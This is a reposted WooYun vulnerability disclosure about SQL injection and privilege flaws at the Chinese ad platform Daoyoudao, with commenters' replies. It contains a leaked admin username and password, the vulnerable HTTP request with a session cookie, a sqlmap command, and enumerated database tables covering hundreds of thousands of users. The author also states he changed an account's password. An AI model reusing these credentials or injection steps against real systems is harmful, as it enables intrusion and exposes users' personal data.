道有道一处SQL注入导致77万用户账号密码泄露/泄露51万商家消息(可修改APK/内部多处越权)

2017年4月4日02:17:38评论519 views字数 245阅读0分49秒阅读模式

摘要

2016-03-27：细节已通知厂商并且等待厂商处理中
2016-03-28：厂商已经确认，细节仅向厂商公开
2016-04-07：细节向核心白帽子及相关领域专家公开
2016-04-17：细节向普通白帽子公开
2016-04-27：细节向实习白帽子公开
2016-05-12：细节向公众公开

漏洞概要关注数(17) 关注此漏洞

缺陷编号： WooYun-2016-189559

漏洞标题：道有道一处SQL注入导致77万用户账号密码泄露/泄露51万商家消息(可修改APK/内部多处越权)

漏洞作者：黑色键盘丶

提交时间： 2016-03-27 12:18

公开时间： 2016-05-12 10:40

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：注射技巧

1人收藏

漏洞详情

披露状态：

简要描述：

315被曝光APP恶意吸费，但是下架APP就是防止APP不被篡改的方法吗

详细说明：

jiayoubama 密码1234567

发现个权限大的号，管理的地区多，直接改密码

编辑页可直接修改

消息管理处越权查看任意信息

客服管理客服这里编辑

随便改一个

SQL注入POST

code 区域

GET /mb/orderdetails.do?ordercode=mb1312311839006231 HTTP/1.1
 Host: m.mb.daoyoudao.com
 Proxy-Connection: keep-alive
 Cache-Control: max-age=0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
 Accept-Encoding: gzip,deflate,sdch
 Accept-Language: zh-CN,zh;q=0.8
 Cookie: Hm_lvt_fe0b746d0d97ad96e482bd98c749aff3=1458912937; JSESSIONID=f7344699-6d82-4210-8560-4c12e847d260

code 区域

注入：F:/sqlmap>sqlmap.py -r 2.txt --dbs

数据库14个可垮裤查询 8w多订单 77w用户

主库表

code 区域

Database: trade_01
 +--------------------------+---------+
 | Table                    | Entries |
 +--------------------------+---------+
 | f_client                 | 1141415 |
 | f_msg                    | 517520  |
 | f_loginlog               | 241888  |
 | f_user                   | 176616  |
 | f_product                | 173435  |
 | f_freight                | 151668  |
 | f_order_detail           | 116543  |
 | f_product_attr_price     | 92166   |
 | f_order                  | 82834   |
 | f_product_subcat         | 76581   |
 | f_product_11970_13849    | 73203   |
 | f_product_copy           | 71224   |
 | f_user_address           | 53635   |
 | f_paydetail              | 49290   |
 | f_product_attr           | 45317   |
 | f_freefreight            | 44025   |
 | f_page                   | 40193   |
 | f_msg_product            | 31462   |
 | f_cat_attr_value         | 29875   |
 | dic_category             | 25700   |
 | f_order_copy             | 21481   |
 | f_paydetail_copy         | 14624   |
 | f_fs_guanggao            | 7441    |
 | f_category               | 4495    |
 | f_guanggao               | 4391    |
 | f_gglist_affiliated      | 4300    |
 | f_information            | 4176    |
 | f_order_operating_record | 3929    |
 | f_cat_attr               | 3888    |
 | f_client_copy            | 3353    |
 | f_leaveword              | 2688    |
 | f_user_group_relate      | 2554    |
 | temp_msg                 | 2012    |
 | f_favorites              | 863     |
 | f_share                  | 826     |
 | f_store                  | 574     |
 | f_promotions             | 434     |
 | f_usergroup              | 379     |
 | f_quota                  | 330     |
 | temp_user_id             | 211     |
 | f_promotions_product     | 96      |
 | f_adv                    | 46      |
 | temp_mobile              | 2       |
 +--------------------------+---------+

17w用户跑出数据证明下

数据库androidpn 60w用户

code 区域

Database: androidpn
 +------------------+---------+
 | Table            | Entries |
 +------------------+---------+
 | apn_user         | 608395  |
 | apn_notification | 56547   |
 +------------------+---------+

漏洞证明：

jiayoubama 密码1234567

发现个权限大的号，管理的地区多，直接改密码

编辑页可直接修改

消息管理处越权查看任意信息

客服管理客服这里编辑

随便改一个

SQL注入POST

code 区域

GET /mb/orderdetails.do?ordercode=mb1312311839006231 HTTP/1.1
 Host: m.mb.daoyoudao.com
 Proxy-Connection: keep-alive
 Cache-Control: max-age=0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
 Accept-Encoding: gzip,deflate,sdch
 Accept-Language: zh-CN,zh;q=0.8
 Cookie: Hm_lvt_fe0b746d0d97ad96e482bd98c749aff3=1458912937; JSESSIONID=f7344699-6d82-4210-8560-4c12e847d260

code 区域

注入：F:/sqlmap>sqlmap.py -r 2.txt --dbs

数据库14个可垮裤查询 8w多订单 77w用户

主库表

code 区域

Database: trade_01
 +--------------------------+---------+
 | Table                    | Entries |
 +--------------------------+---------+
 | f_client                 | 1141415 |
 | f_msg                    | 517520  |
 | f_loginlog               | 241888  |
 | f_user                   | 176616  |
 | f_product                | 173435  |
 | f_freight                | 151668  |
 | f_order_detail           | 116543  |
 | f_product_attr_price     | 92166   |
 | f_order                  | 82834   |
 | f_product_subcat         | 76581   |
 | f_product_11970_13849    | 73203   |
 | f_product_copy           | 71224   |
 | f_user_address           | 53635   |
 | f_paydetail              | 49290   |
 | f_product_attr           | 45317   |
 | f_freefreight            | 44025   |
 | f_page                   | 40193   |
 | f_msg_product            | 31462   |
 | f_cat_attr_value         | 29875   |
 | dic_category             | 25700   |
 | f_order_copy             | 21481   |
 | f_paydetail_copy         | 14624   |
 | f_fs_guanggao            | 7441    |
 | f_category               | 4495    |
 | f_guanggao               | 4391    |
 | f_gglist_affiliated      | 4300    |
 | f_information            | 4176    |
 | f_order_operating_record | 3929    |
 | f_cat_attr               | 3888    |
 | f_client_copy            | 3353    |
 | f_leaveword              | 2688    |
 | f_user_group_relate      | 2554    |
 | temp_msg                 | 2012    |
 | f_favorites              | 863     |
 | f_share                  | 826     |
 | f_store                  | 574     |
 | f_promotions             | 434     |
 | f_usergroup              | 379     |
 | f_quota                  | 330     |
 | temp_user_id             | 211     |
 | f_promotions_product     | 96      |
 | f_adv                    | 46      |
 | temp_mobile              | 2       |
 +--------------------------+---------+

17w用户跑出数据证明下

数据库androidpn 60w用户

code 区域

Database: androidpn
 +------------------+---------+
 | Table            | Entries |
 +------------------+---------+
 | apn_user         | 608395  |
 | apn_notification | 56547   |
 +------------------+---------+

修复方案：

你懂得修改密码啦

版权声明：转载请注明来源黑色键盘丶@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2016-03-28 10:40

厂商回复：

非常感谢！

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-03-27 12:19 | 奶嘴 ( 普通白帽子 | Rank:414 漏洞数:110 | 17岁的毛孩有些厂商故意加你好友，和你聊...)

1

好样的

1# 回复此人
2016-03-27 13:18 | DeadSea ( 普通白帽子 | Rank:284 漏洞数:63 | 本人外形俊朗、眉清目秀、玉树临风、有明星...)

1

可以不用吃屎了~

2# 回复此人
2016-03-27 13:33 | 小龙 ( 普通白帽子 | Rank:2794 漏洞数:546 | 我就问，还有谁！！！！！！！！！！！！！...)

1

315后续再次施加压力，键盘你好样的。程序员保证不打屎你。。。

3# 回复此人
2016-03-27 14:01 | 黑色键盘丶 ( 普通白帽子 | Rank:2413 漏洞数:511 | 哥,是孤独风中的一匹狼)

1

@小龙社会我龙哥6

4# 回复此人
2016-03-27 14:49 | Aasron ( 普通白帽子 | Rank:905 漏洞数:163 | raw_input("你知道我要输入什么？"))

1

记得黑色键盘曾经是我看过的一本黑客小说作者

5# 回复此人
2016-03-27 14:55 | 黑色键盘丶 ( 普通白帽子 | Rank:2413 漏洞数:511 | 哥,是孤独风中的一匹狼)

1

@Aasron 666

6# 回复此人
2016-03-27 15:05 | ’‘Nome ( 普通白帽子 | Rank:144 漏洞数:31 | 有事请发邮件，，垃圾邮...)

1

@黑色键盘丶说好的吃屎呢?

7# 回复此人
2016-03-27 15:07 | 黑色键盘丶 ( 普通白帽子 | Rank:2413 漏洞数:511 | 哥,是孤独风中的一匹狼)

1

@’‘Nome sea吃

8# 回复此人
2016-03-27 16:13 | Format_smile ( 普通白帽子 | Rank:640 漏洞数:217 | ···孰能无过，谁是谁非！)

1

干得漂亮

9# 回复此人

漏洞概要 关注数(17) 关注此漏洞

缺陷编号： WooYun-2016-189559

漏洞标题： 道有道一处SQL注入导致77万用户账号密码泄露/泄露51万商家消息(可修改APK/内部多处越权)

相关厂商： daoyoudao.com

漏洞作者： 黑色键盘丶

提交时间： 2016-03-27 12:18

公开时间： 2016-05-12 10:40

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 注射技巧

1人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 黑色键盘丶@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(17) 关注此漏洞

漏洞标题：道有道一处SQL注入导致77万用户账号密码泄露/泄露51万商家消息(可修改APK/内部多处越权)

漏洞作者：黑色键盘丶

危害等级：高

漏洞状态：厂商已经确认

Tags标签：注射技巧

版权声明：转载请注明来源黑色键盘丶@乌云

漏洞评价(共0人评价):

登陆后才能进行评分